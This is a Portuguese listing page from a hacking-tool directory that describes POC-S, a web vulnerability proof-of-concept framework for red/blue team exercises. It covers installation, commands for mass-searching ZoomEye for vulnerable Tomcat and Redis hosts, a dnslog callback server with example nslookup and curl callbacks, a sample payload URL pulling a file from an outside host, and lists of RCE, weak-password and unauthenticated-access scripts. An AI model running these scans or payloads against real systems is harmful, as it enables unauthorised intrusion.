Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-S — Versão aprimorada do POC-T, POC-S, usada para validar rapidamente vulnerabilidades de aplicações Web em confrontos de equipe vermelha e azul (red team/blue team), com funcionalidades reforçadas e scripts adicionados de forma categorizada, inclui dnslog, etc. A plataforma complementa com POCs de alta disponibilidade do vulhub e de outros projetos de código aberto. | Kitploit
Ferramentas/GitHubGitHub/jiangsir404/poc-s
ReconhecimentoScanners de VulnerabilidadesFrameworks de ExploraçãoColeta de InformaçõesSegurança WebFuzzingTestes de PenetraçãoAnálise de DNS
GitHubjiangsir404/poc-s

POC-S

Ver Repositório
35664há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Versão aprimorada do POC-T, POC-S, usada para validar rapidamente vulnerabilidades de aplicações Web em confrontos de equipe vermelha e azul (red team/blue team), com funcionalidades reforçadas e scripts adicionados de forma categorizada, inclui dnslog, etc. A plataforma complementa com POCs de alta disponibilidade do vulhub e de outros projetos de código aberto.

Compartilhar

POC-S: Versão Reforçada do POC-T

Consulte o diretório doc para a documentação wiki do POC-T

Prefácio: Atualmente

Aviso Legal de Isenção de Responsabilidade

Usar o POC-S para atacar alvos sem consentimento prévio de ambas as partes é ilegal. O POC-S é apenas para fins de teste de segurança.

Características

  • Compatível com a sintaxe do POC-T
  • Boa categorização de POCs, modo de carregamento flexível, suporte para carregamento de arquivo único, lote e qualquer diretório
  • Fornece comandos de terminal pocs/poc-s, separando o framework dos POCs, permitindo colocar POCs personalizados em qualquer diretório
  • Fornece uma plataforma DNS simples, que requer apenas um nome de domínio e um IP público para funcionar, útil para verificar rapidamente injeção cega de comandos e SQL, simples e eficiente.
  • Fornece bons scripts de teste unitário

TODO

  • Coletar e melhorar POCs com base no vulhub e projetos de código aberto, veja minha categorização de POCs para detalhes
  • Fornecer parâmetro --init para atualizar dinamicamente o arquivo de configuração tookit.conf, ex: --init zoomeye, inicializar configuração do ZoomEye
  • Adicionar plataformas dnslog e weblog para verificação rápida de vulnerabilidades
  • Adicionar dois plugins de verificação: ceye.py e dnslog.py
  • Adicionar pocsapi.py, funcionalidade semelhante ao sqlmapapi
  • Adicionar versão Python 3 do POC-S

Uso

Como as interfaces de terceiros exigem autenticação, você pode usar o parâmetro --init para inicializar sua configuração de interface, ex: --init zoomeye

root@kitploit:~
pip install pocs

Instalação a partir do código fonte:

root@kitploit:~
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install

Se ao instalar com pip ocorrer o erro 'Some files missing', vá para o diretório de instalação do pocs (python2.7\Lib\site-packages\pocs) e renomeie tookit.conf. Se ocorrer o erro WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments., é um problema de dependência de pacote. Verifique e atualize as versões de alguns pacotes: setuptools==39.0.1 cachetools==3.1.1 google-api-python-client==1.7.11

  1. Modo de carregamento de plugin mais flexível
root@kitploit:~
pocs -s test/test2.py -iS 127.0.0.1 #carrega script/test/test2.py
pocs -s test2 -iS 127.0.0.1 # carrega script/test2.py

pocs -b test -iS 127.0.0.1 # carrega em lote todos os scripts em /script/test
pocs -b test -s test2.py -iS 127.0.0.1 #carrega script/test/test2.py

pocs -s myself_script.py -iS 127.0.0.1 # carrega script e diretório personalizados
pocs -b mydir -iS 127.0.0.1
  1. Utilização de mecanismos de busca
root@kitploit:~
pocs --init zoomeye //inicializa configuração do ZoomEye
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"

Usar ZoomEye para pesquisar em lote a vulnerabilidade CNVD-2020-10487 tomcat ajp lfi

root@kitploit:~
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

  1. Uso da plataforma dnslog

Se você ainda está preocupado com a instabilidade do ceye, sem tempo ou energia para montar uma plataforma DNSLog (que requer dois domínios, um IP público e que os domínios possam modificar servidores DNS), então experimente a plataforma dnslog simples fornecida pelo POC-S. Requer apenas um domínio e um IP público para montar, fornecendo interface API para verificação (sem interface gráfica).

Suponha que dnslog.xxx.cn seja seu domínio público e x.x.x.x seja o IP público. Certifique-se de que dnslog.xxx.cn possa ser resolvido para x.x.x.x, caso contrário, não será possível acessar a API. Execute o comando no IP público (x.x.x.x):

root@kitploit:~
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88(如果不是pip安装的可以直接运行pocs.dnslog.py脚本)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x

Comando dns log, suporta apenas o comando nslookup: nslookup 1234.dnslog.xxx.cn x.x.x.x

Se você quiser usar o comando ping 1234.dnslog.xxx.cn, também pode configurar servidores DNS personalizados para o domínio xxx.cn (consulte a configuração do DNSLog).

Comando web log: curl http://dnslog.xxx.cn:88/weblog/poc123

Endereço da API: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn Parâmetros: - token (obrigatório) - api_key inserida ao montar o dnslog - type (obrigatório) - valores possíveis: dns/web - filter (opcional) - filtrar registros, correspondência exata

POC

pocs fornece uma maneira mais flexível de categorizar plugins. Atualmente, há quatro categorias de POCs: Fuzz POC, OWASP POC, Vuln POC, Tool POC. Quanto aos POCs, tentaremos coletar alguns já existentes no GitHub, mas não muitos; ainda é necessário que cada um colete e organize os seus próprios. f

A escrita de POCs será o mais padronizada possível, seguindo o estilo de escrita do POC-T. Exemplo abaixo:

root@kitploit:~
#!/usr/bin/env python		
#coding:utf-8

"""
ThinkPHP5 <=5.0.22/<=5.1.29 远程代码执行漏洞

Desc
    2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。
    由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,
    受影响的版本包括5.0.23和5.1.31之前的所有版本,推荐尽快更新到最新版本。
Version
	ThinkPHP5.0 版本 <= 5.0.22 ThinkPHP5.1 版本 <= 5.1.29
Usage:
	1. python POC-S.py -s 
	2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
	https://www.seebug.org/vuldb/ssvid-9771
"""

import requests

def poc(url):
    pass

Vuln POC

Principalmente provenientes da escrita de plugins do vulhub e dos plugins POC incluídos no POC-T, apenas adicionando alguns POCs de alta disponibilidade. Cada POC listado abaixo foi verificado como funcional em ambientes montados por mim. Se houver algum POC incorreto, por favor, abra uma issue para me contatar.

  • struts2
    • s2-005.py
    • s2-015.py
    • s2-016.py
    • s2-032.py
    • s2-045.py
    • s2-052.py
    • s2-053.py
    • s2-057.py
    • struts2-devmode.py
  • weblogic
    • weblogic-ssrf-netmap.py cve-2014-4210
    • weblogc-cve-2017-10271.py (CVE-2017-10271)
    • weblogic-cve-2018-2628.py
    • weblogic-cve-2019-2725.py
    • weblogic-cve-2019-2729.py

Fuzz POC

Fonte: boy-hack/POC-T

  • bakfile: detecção de arquivos de backup
  • crossdomain: crossdomain
  • dzxss
  • gitleak
  • issparse
  • ms15-034
  • phpinfo
  • phpmyadmin
  • svnleak
  • swf
  • tomcat_xmlleak
  • wordspace

OWASP POC

Fonte: script de detecção do Hunter

  • cmd_exec
  • sql_injection
  • xss
  • xxe
  • csrf
  • jsonp_xss
  • jsonp_hijacking
  • file_read
  • ssti
  • ssrf

Tool Poc

Alguns POCs de ferramentas comuns, fornecendo funcionalidades como mecanismos de busca, consulta de informações, etc.

  • bing-dork pesquisa Bing
  • bingc pesquisa reversa de IP para domínio, domínios de segmento C baseada no mecanismo Bing
  • google-dork pesquisa Google
  • cdn-detect detecção de CDN
  • waf detecta WAF e retorna URLs sem WAF
  • craw rastreia endereços relacionados em links
  • vulscan detecta vulnerabilidades de injeção SQL
  • portscan varredura de portas, detecta serviços com senhas fracas
  • domain2ip consulta IP do domínio
  • whois consulta informações WHOIS
  • icp consulta ICP

Outros POCs de código aberto, como o projeto https://github.com/boy-hack/airbug, coletaram alguns POCs que podem ser usados diretamente, mas há uma biblioteca HackRequests que é Python 3, precisa ser adaptada para Python 2. Você pode instalar diretamente minha versão modificada para Python 2: https://github.com/jiangsir404/hack-requests

Baixar ferramenta
  • weblogic-cve-2020-2551.py
  • weblogic-upload-getshell.py (CVE-2018-2894)
  • thinkphp
    • 5-rce
    • 5.0.23-rce
  • Jenkins
    • jenkins-cve-2015-8103.py
    • jenkins-cve-2017-1000353.py
    • jenkins-cve-2018-1000861.py
  • weakpass
    • mysql
    • redis
    • mongo
    • sqlserver
    • ftp
    • telent
    • senha fraca web (backend genérico sem captcha)
    • http-basic-auth
    • coremail
    • jboss
    • jenkins
    • weblogic
  • unauth
    • redis-unauth.py
    • mongodb-unauth.py
    • memcached-unauth.py
    • elasticsearch-unauth.py
    • kubernetes-unauth.py
    • jenkins-unauth.py
    • docker-unauth-rce.py
    • hadoop-unauth.py
  • apache
    • CNVD-2020-10487 tomcat-ajp-lfi.py
    • tomcat-upload.py
    • tomcat-weak-pass.py
  • Citrix
    • cve-2019-19781
  • supervisor
    • supervisord-RCE-CVE-2017-11610.py
  • Jboss
    • jboss-rce.py
    • CVE-2017-12149
    • CVE-2013-4810
  • spring
    • spring-oauth2-rce.py
    • cve-2018-1273
  • phpmyadmin
    • phpmyadmin-auth-rce.py
    • phpmyadmin4.8.1-RFI.py
  • kibana
    • cve-2019-7609
    • cve-2018-17246
  • php
    • fpm-rce.py
    • CVE-2019-11043
    • CVE-2018-19518
  • discuz
    • x3.4-arbitrary-file-deletion
  • zabbix
    • zabbix-jsrpc-mysql-exp.py
    • zabbix-jsrpc-sqli.py
    • zabbix-weakpass.py
    • zabbix_latest_sqli.py
  • dns-zone-transfer
  • confluence
    • confulence-traversal.py
    • travessia de diretório e execução remota de comandos no Confluence